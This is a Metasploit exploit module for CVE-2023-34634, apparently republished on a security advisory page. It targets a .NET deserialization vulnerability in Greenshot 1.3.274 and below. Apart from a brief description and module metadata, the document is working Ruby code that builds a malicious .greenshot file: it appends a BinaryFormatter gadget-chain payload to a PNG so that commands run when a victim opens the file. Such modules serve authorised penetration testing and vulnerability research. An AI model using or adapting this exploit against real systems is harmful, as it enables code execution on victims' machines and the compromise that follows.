Authored by bwatters-r7, p4r4bellum | Site metasploit.com

There exists a .NET deserialization vulnerability in Greenshot versions 1.3.274 and below. The deserialization allows the execution of commands when a user opens a Greenshot file. The commands execute under the same permissions as the Greenshot service. Typically, it is the logged in user.

advisories | CVE-2023-34634

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Post::File

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Greenshot .NET Deserialization Fileformat Exploit',
        'Description' => %q{
          There exists a .NET deserialization vulnerability in Greenshot version 1.3.274
          and below.  The deserialization allows the execution of commands when a user opens
          a Greenshot file.  The commands execute under the same permissions as the Greenshot
          service.  Typically, is the logged in user.
        },
        'DisclosureDate' => '2023-07-26',
        'Author' => [
          'p4r4bellum',  # Discovery
          'bwatters-r7', # msf exploit
        ],
        'References' => [
          ['CVE', '2023-34634'],
          ['EDB', '51633']
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => ARCH_CMD,
        'Targets' => [
          [ 'Windows', {} ],
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]
        }
      )
    )

    register_options([
      OptPath.new('PNG_FILE', [false, 'PNG file to use'])
    ])
  end

  def exploit
    if datastore['PNG_FILE'].blank?
      image_file = File.join(Msf::Config.data_directory, 'exploits', 'cve-2023-34634', 'test.png')
    else
      image_file = datastore['PNG_FILE']
    end

    datastore['FILENAME'] = Rex::Text.rand_text_alpha(rand(6..13)) if datastore['FILENAME'].blank?
    if datastore['FILENAME'].length < 10 || datastore['FILENAME'][-10, -1] != '.greenshot'
      datastore['FILENAME'] << '.greenshot'
    end
    cmd = payload.encoded

    image_data = File.binread(image_file)

    deserialize_cmd = ::Msf::Util::DotNetDeserialization.generate(
      cmd,
      gadget_chain: :WindowsIdentity,
      formatter: :BinaryFormatter
    )

    payload_length = deserialize_cmd.length
    outfile = image_data
    outfile << deserialize_cmd
    outfile << [payload_length].pack('Q')
    outfile << 'Greenshot01.02'
    file_create(outfile)
  end
end

RELATED ARTICLESMORE FROM AUTHOR